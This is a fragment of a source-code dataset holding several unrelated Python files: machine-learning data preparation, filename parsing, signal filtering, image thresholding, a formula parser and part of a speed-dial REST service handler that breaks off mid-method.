% (tgtSeq, seqlen, max_seq_length ))\n continue\n token_ids = token_ids + [ text_encoder.EOS_ID ] + [ text_encoder.PAD_ID] * (max_seq_length - seqlen -1)\n encodedFullTargetSpace[id] = token_ids\n tgtIdNameMap[id] = tgtSeq\n decoded_tgt = encoder.decode(token_ids)\n subtoken_strings = [encoder._all_subtoken_strings[i] for i in token_ids]\n #debugging\n # encodedFullTargetFile.write(id + '\\t' + tgtSeq.strip() + '\\t' + ','.join([str(i) for i in token_ids]) + '\\t' + ','.join(subtoken_strings) + '\\t' + decoded_tgt + '\\n' )\n encodedFullTargetFile.write(id + '\\t' + tgtSeq.strip() + '\\t' + ','.join([str(i) for i in token_ids]) + '\\n' )\n\n encodedFullTargetFile.close()\n\n #create Encoded Training Corpus: (srcTokens, srcLen, tgtTokens, tgtLen, RelevanceLabel)\n trainingCorpus = gen_classification_corpus( os.path.join(processed_data_dir, \"TrainPairs\" ), encodedFullTargetSpace, encoder, max_seq_length)\n #creat evaluation corpus: (srcTokens, srcLen, tgtLabels)\n evalCorpus = []\n for line in codecs.open( os.path.join(processed_data_dir, \"EvalPairs\" ), \"r\", 'utf-8'):\n info = line.strip().split('\\t')\n if len(info) != 3:\n print(\"EvalFile has Bad line of training data:\\n %s\" % ( line ) )\n continue\n srcSeq, tgtSeq, tgtId = info\n # verify target sequence correctness\n if tgtId not in set(encodedFullTargetSpace.keys()):\n print('Error Detected!! trouble in finding evalPairs targetID in target Space file!! %s' % line)\n continue\n source_tokens = encoder.encode(srcSeq.lower())\n seqlen = len(source_tokens)\n if seqlen > max_seq_length - 1:\n print(\n 'Error Deteced!!! \\n Source Seq:\\n %s \\n Its seq length is:%d, which is longer than MAX_SEQ_LENTH of %d. Try to increase limit!!!!' % (\n srcSeq, seqlen, max_seq_length))\n continue\n source_tokens = source_tokens + [text_encoder.EOS_ID] + [text_encoder.PAD_ID] * (max_seq_length - seqlen - 1)\n # get positive sample\n evalCorpus.append((source_tokens, source_tokens.index(text_encoder.PAD_ID) +1, tgtId ) )\n\n #debugging purpose\n print(\"evalCorpus[1] is:\\n source_tokens: %s \\n source_length: %s \\n tgtId: %s\" % ( str(evalCorpus[1][0]), str(evalCorpus[1][1]), str(evalCorpus[1][2]) ) )\n\n return trainingCorpus, evalCorpus, encodedFullTargetSpace, tgtIdNameMap\n\n\ndef get_search_corpus(processed_data_dir, encoder, max_seq_length):\n \"\"\"\n\n :param processed_data_dir:\n :param encoder:\n :param negative_samples:\n :param max_seq_length:\n :return:\n \"\"\"\n raise NotImplementedError('Search Ranking Task will be supported very soon.')\n\n\ndef get_questionAnswer_corpus(processed_data_dir, encoder, max_seq_length):\n \"\"\"\n\n :param processed_data_dir: contains TrainPairs, EvalPairs and targetIDs files\n :param encoder:\n :param max_seq_length:\n :return:\n \"\"\"\n # note QnA task's data format is the same as Classification task. So we can reuse it.\n\n return get_classification_corpus(processed_data_dir, encoder, max_seq_length)\n\n\n\ndef prepare_raw_data(raw_data_dir, processed_data_dir, vocabulary_size, task_type, max_seq_length):\n \"\"\"Get SSE training-Evaluation data into data_dir, create vocabularies and tokenized data.\n\n Args:\n raw_data_dir: directory contains the raw zipped dataset.\n processed_data_dir: directory in which the processed data sets will be stored.\n vocabulary_size: size of the vocabulary to create and use if no vocabulary file found in rawdata. 
Otherwise, use supplied vocabulary file.\n task_type: different task_type has slightly different rawdata format, and need different treatment\n for classification task, usually has TrainPairs, EvalPairs, targetSpaceID file\n for search task,\n for cross-lingual search tasks,\n for question answer tasks,\n max_seq_length: max number of tokens of a single source/target sequence\n Returns:\n A tuple of 5 elements:\n (1) path to encoded TrainPairs: targetID, Sequence of source token IDs\n (2) path to encoded EvalPairs: targetID, Sequence of source token IDs\n (3) path to encoded full TargetSpaces: targetID, Sequence of target token IDs\n (4) path to the source vocabulary file,\n (5) path to the target vocabulary file.\n \"\"\"\n # extract corpus to the specified processed directory.\n get_data_set(raw_data_dir, processed_data_dir)\n\n # generate vocab file if not available, otherwise, use supplied vocab file for encoder\n vocabFile = processed_data_dir + '/vocabulary.txt'\n if gfile.Exists( vocabFile ):\n print(\"Loading supplied vocabluary file: %s\" % vocabFile )\n encoder = text_encoder.SubwordTextEncoder(filename=vocabFile)\n print(\"Total vocab size is: %d\" % encoder.vocab_size )\n else:\n print(\"No supplied vocabulary file found. Build new vocabulary based on training data ....\")\n token_counts = tokenizer.corpus_token_counts( processed_data_dir + '/*.Corpus', 1000000, split_on_newlines=True)\n encoder = text_encoder.SubwordTextEncoder.build_to_target_size( vocabulary_size, token_counts, 2, 1000 )\n encoder.store_to_file(vocabFile)\n print(\"New vocabulary constructed.\")\n\n # create training corpus and evaluation corpus per task_type\n if task_type.lower().strip() == \"classification\":\n train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap = get_classification_corpus( processed_data_dir, encoder, max_seq_length)\n elif task_type.lower().strip() in [\"ranking\", \"crosslingual\" ]:\n train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap = get_search_corpus( processed_data_dir, encoder, max_seq_length)\n elif task_type.lower().strip() == \"qna\":\n train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap = get_questionAnswer_corpus(processed_data_dir, encoder, max_seq_length)\n else:\n raise ValueError(\"Unsupported task_type. Please use one of: classification, search, crosslanguages, questionanswer\")\n\n return encoder, train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap\n\n\n\n\ndef load_encodedTargetSpace(processed_data_dir):\n \"\"\"\n\n :param processed_data_dir:\n :return:\n \"\"\"\n vocabFile = processed_data_dir + '/vocabulary.txt'\n if gfile.Exists( vocabFile ):\n encoder = text_encoder.SubwordTextEncoder(filename=vocabFile)\n print(\"Loaded vocab size is: %d\" % encoder.vocab_size )\n else:\n raise ValueError(\"Error!! Could not found vaculary file in model folder.\")\n encodedTgtSpace = {}\n tgtID_Name_Map = {}\n tgtEncodeFile = os.path.join(processed_data_dir, \"encoded.FullTargetSpace\")\n if not gfile.Exists(tgtEncodeFile):\n raise ValueError(\"Error! 
could not found encoded.FullTargetSpace in model folder.\")\n print(\"Loading full target space index ...\")\n for line in codecs.open( tgtEncodeFile, 'r', 'utf-8'):\n tgtId, tgtName, tgtEncoding = line.strip().split('\\t')\n tgtID_Name_Map[tgtId] = tgtName\n encodedTgtSpace[tgtId] = [ int(i) for i in tgtEncoding.split(',') ]\n return encoder, encodedTgtSpace, tgtID_Name_Map\n\n\n\ndef save_model_configs(processed_data_dir, configs):\n max_seq_length, max_gradient_norm, vocabsize, embedding_size, \\\n encoding_size, src_cell_size, tgt_cell_size, num_layers, \\\n learning_rate, learning_rate_decay_factor, targetSpaceSize, network_mode, TOP_N = configs\n outfile = codecs.open( os.path.join(processed_data_dir,'modelConfig.param'), 'w', 'utf-8')\n outfile.write( 'max_seq_length=' + str(max_seq_length) + '\\n')\n outfile.write( 'max_gradient_norm=' + str(max_gradient_norm) + '\\n')\n outfile.write( 'vocabsize=' + str(vocabsize) + '\\n')\n outfile.write( 'embedding_size=' + str(embedding_size) + '\\n')\n outfile.write( 'encoding_size=' + str(encoding_size) + '\\n')\n outfile.write( 'src_cell_size=' + str(src_cell_size) + '\\n')\n outfile.write( 'tgt_cell_size=' + str(tgt_cell_size) + '\\n')\n outfile.write( 'num_layers=' + str(num_layers) + '\\n')\n outfile.write( 'learning_rate=' + str(learning_rate) + '\\n')\n outfile.write( 'learning_rate_decay_factor=' + str(learning_rate_decay_factor) + '\\n')\n outfile.write( 'targetSpaceSize=' + str(targetSpaceSize) + '\\n')\n outfile.write( 'network_mode=' + str(network_mode) + '\\n')\n outfile.write( 'TOP_N=' + str(TOP_N) + '\\n')\n outfile.close()\n return\n\n\ndef load_model_configs(processed_data_dir):\n modelConfig={}\n for line in open(processed_data_dir + '/modelConfig.param', 'rt'):\n if '=' not in line.strip():\n continue\n key, value = line.strip().split('=')\n modelConfig[key]=value\n return modelConfig\n\ndef getSortedResults(scores):\n rankedIdx = np.argsort( -scores )\n sortedScore = -np.sort( -scores, axis=1 )\n print('Sample top5 scores:' , sortedScore[0:5])\n return sortedScore, rankedIdx\n\ndef computeTopK_accuracy( topk, labels, results ):\n k = min(topk, results.shape[1])\n nbrCorrect=0.0\n for i in xrange(results.shape[0]):\n if labels[i] in results[i][:k]:\n nbrCorrect += 1.0\n return nbrCorrect / float(results.shape[0])\n\n","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":15482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"116920276","text":"import os\nPathJoin = os.path.join\n\ntgtroot = 'tsload-mbench'\ntarget = 'nodemem'\n\nImport('env')\n\nmod = env.Clone()\n\nmod.Append(LIBS = ['numa'])\nmod.Append(CCFLAGS = ['-O2'])\n\nmodule = mod.Module('load', target)\n\nexperiment_json = File('experiment.json')\n\nmod.Depends(module, [experiment_json])\n\ninstall_path = PathJoin(mod['INSTALL_VAR'], 'mbench', target)\nmod.InstallTarget(tgtroot, install_path, experiment_json)","sub_path":"nodemem/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"494826179","text":"# -*- coding: utf-8 -*-\nimport re\nimport unicodedata\n\n__author__ = 'Matthieu Gallet'\n\n\nclass XmlParser(object):\n duration_hmn = re.compile(r'^(\\d+)h (\\d+)mn$')\n duration_hmns = re.compile(r'^(\\d+)h (\\d+)mn (\\d+)s$')\n duration_mn = re.compile(r'^(\\d+)mn$')\n duration_mns = re.compile(r'^(\\d+)mn (\\d+)s$')\n bitrate_bps = 
re.compile(r'^([0-9\\.\\s]*) (mbps|bps|kbps)$')\n size = re.compile(r'^([0-9\\.\\s]*) (KiB|MiB|GiB) \\(\\d+\\.?\\d*%\\)$')\n\n @staticmethod\n def get_xml_tag(track, name):\n l = track.getElementsByTagName(name)\n if len(l) == 0:\n return None\n return l[0].firstChild.data\n\n @staticmethod\n def get_xml_duration(track, name):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n t = XmlParser.duration_hmns.match(value)\n if t:\n return 3600 * int(t.group(1)) + 60 * int(t.group(2)) + int(t.group(3))\n t = XmlParser.duration_hmn.match(value)\n if t:\n return 3600 * int(t.group(1)) + 60 * int(t.group(2))\n t = XmlParser.duration_mn.match(value)\n if t:\n return 60 * int(t.group(1))\n t = XmlParser.duration_mns.match(value)\n if t:\n return 60 * int(t.group(1)) + int(t.group(2))\n return None\n\n @staticmethod\n def get_xml_dimension(track, name, unit=''):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n unit = unit.lower()\n value = value.lower()\n t = re.match('^([0-9\\.\\s]*)\\s?{0}$'.format(unit), value)\n if t:\n return float(t.group(1).replace(' ', ''))\n t = re.match('^([0-9\\.\\s]*):([0-9\\.\\s]*)\\s?{0}$'.format(unit), value)\n if t:\n return float(t.group(1).replace(' ', '')) / float(t.group(2).replace(' ', ''))\n return None\n\n @staticmethod\n def get_xml_bit_rate(track, name):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n value = value.lower()\n t = XmlParser.bitrate_bps.match(value)\n if t:\n value = float(t.group(1).replace(' ', ''))\n if t.group(2) == 'kbps':\n value *= 1000.\n elif t.group(2) == 'mbps':\n value *= 1000. * 1000.\n return value\n return None\n\n @staticmethod\n def get_xml_size(track, name):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n t = XmlParser.size.match(value)\n if not t:\n return None\n s = float(t.group(1).replace(' ', '')) * 1024\n if t.group(2) == 'MiB':\n s *= 1024\n elif t.group(2) == 'GiB':\n s *= 1024 * 1024\n return s\n\n\nteam_tags_nocase = (\n '[', '1080p', '720p', '1080i', 'LIMITED', 'LiMiTED', 'TRUEFRENCH', 'DVDRiP', 'BRRiP', 'UNRATED', 'SUBFORCED',\n 'RERiP', 'BDRip', 'EXTENDED', 'REPACK', 'XViD',\n)\nteam_tags_case = ('FRENCH', )\nend_with_year = re.compile('.*\\s(19\\d{2}|2[0-3]\\d{2})$')\n\n\ndef clean_filename(name):\n name = unicodedata.normalize('NFKD', name)\n return re.sub(r'[!:/\\\\]', '-', name)\n\n\ndef clean_movie_filename(name):\n src_name = name\n name = name.replace('-', ' ').replace('.', ' ').replace('_', ' ')\n for tag in team_tags_nocase:\n t = name.lower().find(tag.lower())\n if t > 0:\n name = name[0:t]\n for tag in team_tags_case:\n t = name.find(tag)\n if t > 0:\n name = name[0:t]\n name = name.strip()\n if end_with_year.match(name):\n name = name[0:-4]\n return name or src_name\n\n\ndef guess_movie_infos(name):\n code = None\n languages = 'VF'\n volume = 1\n volume_count = 1\n name_l = name.lower()\n if name_l.find('cd1') > -1 or name_l.find('cd 1') > -1:\n volume_count = 2\n if name_l.find('cd2') > -1 or name_l.find('cd 2') > -1:\n volume = 2\n volume_count = 2\n if name_l.find(' fr ') > -1 or name_l.find('french') > -1:\n languages = 'VF'\n if name_l.find(' eng ') > -1 or name_l.find(' vo ') > -1:\n languages = 'VF VO'\n elif name_l.find('vost') > -1:\n languages = 'VF VOST'\n elif name_l.find(' eng ') > -1 or name_l.find(' vo ') > -1:\n languages = 'VO'\n elif name_l.find('vost') > -1:\n languages = 'VOST'\n if name_l.find(' sub ') > -1 or name_l.find(' st ') > -1:\n languages += 'ST'\n else:\n name = 
clean_movie_filename(name)\n return {'languages': languages, 'volume': volume, 'volume_count': volume_count, 'name': name, 'code': code, }\n","sub_path":"plexyglass/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"189202233","text":"# Jérôme Pacquet, paqj2905\n# Malcolm St. John, stjm2505\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom lib import zplane\n\n\nfe = 1600\nwp = 650\nws = 750\nwc = 32490.15\nx = 4 * fe**2\ny = 2**1.5 * fe\nzeroes = [-1, -1]\nden_coef = [1, -1.1939, 0.4359]\n\n\n# Afficher les poles et zeros sur le cercle complexe\ndef graph_poles_zeroes(zeroes, den_coef, function_name):\n zplane.zplane(np.poly(zeroes), den_coef, function_name)\n\n\n# Load the image into python from npy file\ndef load_img(img_name):\n img_load = np.load(img_name)\n plt.figure()\n plt.imshow(img_load, cmap='gray')\n plt.title('Image sans modifs')\n plt.show()\n return img_load\n\n\n# Afficher la reponse en freqences\ndef freqresponse(num, den, type):\n freq, response = signal.freqz(num, den)\n plt.figure()\n plt.plot(freq, 20*np.log10(np.absolute(response)))\n plt.title('Reponse en frequence de : ' + type)\n plt.xlabel('Frequence normalisee')\n plt.ylabel('Reponse')\n plt.show()\n\n\n# Appliquer les filtre bilineaire a l'image\ndef reponse_filtre_bilineaire(img_load):\n filterout = signal.lfilter(np.poly(zeroes), den_coef, img_load)\n plt.figure()\n plt.imshow(filterout, cmap='gray')\n plt.title('Image corrigee bilineaire')\n plt.show()\n freqresponse(np.poly(zeroes), den_coef, 'Bilineaire')\n return filterout\n\n\n# Appliquer le filtre de python sur l'image\ndef reponse_filtre_python(img_load, num, den):\n filterout = signal.lfilter(num, den, img_load)\n plt.figure()\n plt.imshow(filterout, cmap='gray')\n plt.title('Image debruiter python filter')\n plt.show()\n freqresponse(num, den, 'Python')\n return filterout\n\n\ndef debruiter_bilineaire(img):\n graph_poles_zeroes(zeroes, den_coef, 'bilineaire')\n return reponse_filtre_bilineaire(img)\n\n\ndef debruiter_python(img):\n ord, wn = signal.buttord(wp/(fe/2), ws/(fe/2), 0.5, 40)\n b, a = signal.butter(ord, wn)\n graph_poles_zeroes(b, a, 'python')\n return reponse_filtre_python(img, b, a)\n\n\nif __name__ == \"__main__\":\n print('Executing main')\n img = load_img('../images/goldhill_bruit.npy')\n debruiter_bilineaire(img)\n debruiter_python(img)\n","sub_path":"S5/app5/lib/debruiter.py","file_name":"debruiter.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"391947741","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom datetime import datetime\nfrom pytz import utc as pytz_utc\n\nfrom alamo_scheduler.conf import settings\nfrom alamo_scheduler.drivers import DriverBase\nfrom alamo_scheduler.zero_mq import ZeroMQQueue\n\nlogger = logging.getLogger(__name__)\n\n\nclass DefaultSender(DriverBase):\n def __init__(self):\n self.queue = ZeroMQQueue(\n settings.ZERO_MQ_HOST,\n settings.ZERO_MQ_PORT\n )\n self.queue.connect()\n\n def send(self, check):\n \"\"\"Schedule check.\"\"\"\n logger.info(\n 'Check `%s:%s` scheduled.', check['uuid'], check['name']\n )\n\n check['scheduled_time'] = datetime.now(tz=pytz_utc).isoformat()\n 
self.queue.send(check)\n","sub_path":"alamo_scheduler/drivers/default/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"197752587","text":"import logging\n\nimport connexion\n\nfrom fm_url_checker.producer import settings\n\nlog = logging.getLogger(__name__)\n\n\ndef create_app():\n    connexion_app = connexion.App(settings.NAME, specification_dir=\"fm_url_checker/producer/openapi/\")\n    connexion_app.add_api(\n        \"api.yaml\",\n        # validate_responses=False,\n    )\n\n    return connexion_app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n    log.info(f\"Server starting on port: {settings.DEV_SERVER_PORT}\")\n    app.run(port=settings.DEV_SERVER_PORT, debug=settings.DEBUG)\n","sub_path":"fm_url_checker/producer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"651034925","text":"from com.scripts.script_01 import *\nimport HTMLTestRunner\n\n\nclass Suite(unittest.TestCase):\n    \"\"\"HTML Report is working in Python 2, not in Python 3.\"\"\"\n\n    def test_main(self):\n        logging.info('Inside test suite')\n        self.suite = unittest.defaultTestLoader.loadTestsFromTestCase(Script01_SignIn)\n\n        outfile = open(Initilization.path+\"Report\\\\HTML_Report\\\\TestReport.html\", \"w\")\n        runner = HTMLTestRunner.HTMLTestRunner(stream = outfile, title = 'Execution Report', description = 'Suite_02 Run')\n        runner.run(self.suite)\n\n# import unittest\n# if __name__==\"__main__\":\n#     HTMLTestRunner.main","sub_path":"com/suite_02.py","file_name":"suite_02.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"536697060","text":"from sys import stdin\nfrom LinkedQFile import LinkedQ\nfrom atomer import atomer\n\n#<formel>::= <mol>\n#<mol> ::= <group> | <group><mol>\n#<group> ::= <atom> | <atom><num> | (<mol>)<num>\n#<atom> ::= <LETTER> | <LETTER><letter>\n#<LETTER>::= A | B | C | ... | Z\n#<letter>::= a | b | c | ... 
| z\n#<num> ::= 2 | 3 | 4 | ...\n\ndef readFormel():\n    \"\"\" readFormel \"\"\"\n    readMol()\n\ndef readMol():\n    \"\"\" readMol \"\"\"\n    print(\"Readmol\")\n    readGroup()\n    if not q.isEmpty():\n        readMol()\n    \ndef readGroup():\n    \"\"\" readGroup \"\"\"\n    print(\"Readgroup\")\n    if q.peek() == \"(\":\n        q.get()\n        readMol()\n        if q.get() == \")\":\n            readNum()\n            return\n        raise SyntaxFel(\"Missing right parenthesis.\")\n    \n    if not q.isEmpty():\n        if q.peek() == \")\":\n            return\n    readAtom()\n    if not q.isEmpty():\n        readNum()\n    \ndef readAtom():\n    \"\"\" readAtom \"\"\"\n    print(\"Readatom\")\n    atomer = [\"H\",\"He\",\"Li\",\"Be\",\"B\",\"C\",\"N\",\"O\",\"F\",\"Ne\",\"Na\",\"Mg\",\"Al\",\"Si\",\"P\",\"S\",\"Cl\",\"K\",\"Ar\",\"Ca\",\"Sc\",\"Ti\",\"V\",\"Cr\",\"Mn\",\"Fe\",\"Ni\",\"Co\",\"Cu\",\"Zn\",\"Ga\",\"Ge\",\"As\",\"Se\",\"Br\",\"Kr\",\"Rb\",\"Sr\",\"Y\",\"Zr\",\"Nb\",\"Mo\",\"Tc\",\"Ru\",\"Rh\",\"Pd\",\"Ag\",\"Cd\",\"In\",\"Sn\",\"Sb\",\"I\",\"Te\",\"Xe\",\"Cs\",\"Ba\",\"La\",\"Ce\",\"Pr\",\"Nd\",\"Pm\",\"Sm\",\"Eu\",\"Gd\",\"Tb\",\"Dy\",\"Ho\",\"Er\",\"Tm\",\"Yb\",\"Lu\",\"Hf\",\"Ta\",\"W\",\"Re\",\"Os\",\"Ir\",\"Pt\",\"Au\",\"Hg\",\"Tl\",\"Pb\",\"Bi\",\"Po\",\"At\",\"Rn\",\"Fr\",\"Ra\",\"Ac\",\"Pa\",\"Th\",\"Np\",\"U\",\"Am\",\"Pu\",\"Cm\",\"Bk\",\"Cf\",\"Es\",\"Fm\",\"Md\",\"No\",\"Lr\",\"Rf\",\"Db\",\"Hs\",\"Sg\",\"Bh\",\"Mt\",\"Rg\",\"Ds\",\"Cn\"]\n    upper = map(chr, range(ord(\"A\"), ord(\"Z\")))\n    lower = map(chr, range(ord(\"a\"), ord(\"z\")))\n    tmp = q.get()\n    if not q.isEmpty() and q.peek() in lower:\n        if tmp+q.peek() in atomer:\n            q.get()\n            return\n        raise SyntaxFel(\"Unknown atom at the end of the line\")\n    if tmp in atomer:\n        return\n    raise SyntaxFel(\"Unknown atom at the end of the line\")\n    \ndef readNum():\n    \"\"\" readNum \"\"\"\n    print(\"Readnum\")\n    num = q.get()\n    if num.isdigit() and int(num) > 1:\n        return True\n    raise SyntaxFel(\"Number too small at the end of the line\")\n\nclass SyntaxFel(Exception):\n    def __init__(self, value):\n        self.value = value\n    def __str__(self):\n        return repr(self.value)\n    \n\nq = LinkedQ()\n\nstring = \"(H2O)3\"\nfor i in string:\n    q.put(i)\n    \ntry:\n    readFormel()\n    print(\"Follows syntax!\")\nexcept SyntaxFel as msg:\n    print(msg,\"before\")\n    while not q.isEmpty():\n        print(q.get())\n\n#row = stdin.readline()\n#while row:\n#    if row[0] != \"#\":\n#        row = row.strip()\n#        row = list(row)\n#        for i in row:\n#            q.put(i)\n#        readFormel()\n#        row = stdin.readline()","sub_path":"lab6/formelkoll_old.py","file_name":"formelkoll_old.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"241102835","text":"i = 1\nwith open('files/quiz.txt') as file_in:\n    lines = file_in.readlines()\n    print(file_in.readlines())\nwith open('files/quiz_result2.txt') as file_out:\n    print(file_out.write('Grade 2: Math Quiz.\\n'))\n    # for l, equation in lines, start = 1:\n    #     try:\n    #         file_out.write(f'{i:1d}', ' = ___')\n    #     except EquationError:\n    #         print(\"Equation Error: 'str' and 'str\")\n    #     except MathError:\n    #         print(\"Math Error: Any number cannot divide by zero\")\n    #     except InvalidOperation:\n    #         print(\"Invalid Operation: must be +, -, * and / only\")\n\n    # for l in lines:\n    #     if l not in '+-*/':\n        \n    #     print(n)\n    #     file_out.write(f'{i:01d}, {Grade 2: Math Quiz.}')\n    #     file_out.write(f'{i:01d}., {n}')\n    #     i+=1","sub_path":"activities/file_quiz.py","file_name":"file_quiz.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"491435457","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nig = cv2.imread('./img/cameraman.tif',0)\ncv2.imshow('imagen',ig)\nh = cv2.calcHist([ig],[0],None,[256],[0,256])\n# normalizo el histograma\nh = h / h.sum()\nh = h.flatten()\nplt.bar(range(0,256),h)\nplt.show()\n# elijo el primer umbral a la mitad de la dinamica de grises\nT = 180\n# defino un error calculado entre el anterior umbral y el actual\ne = 3\ndif = 6\n\nwhile dif > e:\n x1 = np.array(range(1,T))\n h1 = h[1:T] / sum(h[1:T])\n m1 = np.sum(x1 * h1)\n \n x2 = np.array(range(T,len(h)-1))\n h2 = h[T:-1] / sum(h[T:-1])\n m2 = np.sum(x2 * h2)\n \n Tant = T\n \n T = np.int((m2 - m1) / 2)\n print('m2 ', T)\n \n dif = np.abs(T - Tant) \n\n\nplt.figure(2)\nplt.imshow(ig > T)\nplt.show()","sub_path":"Material/script_umbralVariable.py","file_name":"script_umbralVariable.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"222634428","text":"#!/usr/bin/env python\n#***************************************************************************/\n#*\n#* Copyright (c) 2007 Vonage Holdings Corp.\n#* All rights reserved.\n#*\n#*\n#***************************************************************************/\n#\n\n\"\"\"\nSpeed Dial\n==========\n\tThe Speed Dial service can be used to query contact manager\n\tto find the did associated with a Vonage username and\n\tthree digit speed dial code, as well as update or delete speed dial settings.\n\n\tOverview\n\t--------\n\t - B{Version}\n\t\t- 1.0.1\n\t - B{SVN Revision}\n\t\t- $Revision: 414357 $\n\t - B{Method}\n\t\t- HTTP GET\n\t\t- HTTP POST\n\t\t- HTTP DELETE\n\t - B{Required get parameters}\n\t\t- username\n\t - B{Optional get parameters}\n\t\t- speed_dial\n\t - B{Required post parameters}\n\t\t- username\n\t\t- speed_dial\n\t\t- telephone_number_id\n\t\t- modify_program\n\t - B{Required delete parameters}\n\t\t- username\n\t\t- speed_dial\n\t - B{Returns}\n\t\t- HTTP 200 - On success, with XML response body.\n\t\t- HTTP 403 - When an invalid speed dial setting is attempted to be set\n\t\t- HTTP 404 - When no speed dial setting is found for the speed dial code and username\n\t\t- HTTP 500 - Server error, exception information and stack trace\n\t\tin XML response body\n\t - B{Routes}\n\t\t- /dispatcher/speed_dial\n\t\t- /contact_manager/speed_dial\n\n\tExamples\n\t--------\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=100\"\n\n\t Returns::\n\t\t\n\t\t\n\t\t 18604638587\n\t\t\n\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=*74%20100\"\n\n\t Returns::\n\t\t\n\t\t\n\t\t 18604638587\n\t\t\n\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo\"\n\n\t Returns::\n\t\t\n\t\t \n\t\t 173653\n\t\t 121\n\t\t 12015628830\n\t\t \n\t\t \n\t\t 173653\n\t\t 181\n\t\t 12015628830\n\t\t \n\t\t ...\n\t\t\n\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=111\"\n\n\t Returns::\n\t\t\n\t\t\n\t\t Speed Dial Not Found\n\t\t\n\n\t curl -X POST -d \"username=foo&speed_dial=411&telephone_number_id=11123\" \"http://:8087/dispatcher/speed_dial\"\n\t\n\t Returns::\n\t\t\n\t\t\n\t\t Invalid Speed Dial Value\n\t\t\n\n\t curl -X POST -d \"username=foo&speed_dial=101&telephone_number_id=5\" \"http://:8087/dispatcher/speed_dial\"\n\n\t Returns::\n\t\tHTTP/1.1 200 OK\t\n\n\t curl -X DELETE \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=101\"\n\n\t Returns::\n\t\tHTTP/1.1 200 OK\t\n\n\tHistory\n\t-------\n\t 
- Created: Nick Milkovits 02/05/2008\n\"\"\"\n\n\nfrom vonage.dispatcher.handler import Handler\nfrom vonage.util.vonxmlserializer import XMLSerializer\nfrom vonage.util.rest_utils import RestClientError\nimport contact_manager.phone_format as phone_format\n\nimport psycopg2\n\nDEFAULT_SERVICE_ENVELOPE_VERSION = 1.0\nSERVICE_ATTRIBUTES = {'name': 'speed_dial',\n\t'version': str(DEFAULT_SERVICE_ENVELOPE_VERSION),\n\t'revision': '$Revision: 414357 $'}\n\nclass ReturnObject(XMLSerializer):\n\t\"\"\"The object representation of the XML document\"\"\"\n\tdef __init__(self):\n\t\tself.speed_dial_number = None\n\t\tself.speed_dial_did = None\n\t\tself.contact_telephone_number_id = None\n\nclass SpeedDialSummary(XMLSerializer):\n\tdef __init__(self):\n\t\tself.speed_dial = []\n\nclass ErrorObject(XMLSerializer):\n\tdef __init__(self):\n\t\tself.error = None\n\nclass SpeedDialHandler(Handler):\n\t\"\"\"Encapsulates service request handling logic\"\"\"\n\tdef __init__(self):\n\n\t\tHandler.__init__(self, DEFAULT_SERVICE_ENVELOPE_VERSION)\n\t\tself.required_get_args = ['username']\n\t\tself.optional_get_args = ['speed_dial']\n\n\t\tself.required_post_args = ['speed_dial', 'username', 'telephone_number_id', 'modify_program']\n\t\tself.required_delete_args = ['speed_dial', 'username']\n\n\tdef get(self, http, req_dict):\n\n\t\tusername = req_dict['username']\n\t\tif req_dict['speed_dial'] is None:\n\t\t\tobj = self.get_summary(username)\n\t\t\t#######################\n\t\t\t### BEGIN DELETE ME ###\n\t\t\t#######################\n\t\t\tlegacy_obj = self.legacy_get_summary(username)\n\t\t\tobj = self.merge_results(obj, legacy_obj)\n\t\t\t#####################\n\t\t\t### END DELETE ME ###\n\t\t\t#####################\n\t\telse: \n\t\t\tspeed_dial = self.scrub_speed_dial(req_dict['speed_dial'])\n\t\t\tobj = self.query_speed_dial(username, speed_dial)\n\t\t\t#######################\n\t\t\t### BEGIN DELETE ME ###\n\t\t\t#######################\n\t\t\tif obj is None:\n\t\t\t\tobj = self.legacy_query_speed_dial(username, speed_dial)\n\t\t\t#####################\n\t\t\t### END DELETE ME ###\n\t\t\t#####################\n\t\t\tif obj is None:\n\t\t\t\thttp.status = 404\n\t\t\t\tobj = ErrorObject()\n\t\t\t\tobj.error = \"Speed Dial Not Found\"\n\n\t\treturn obj.dumps(SERVICE_ATTRIBUTES)\n\n\tdef post(self, http, req_dict, 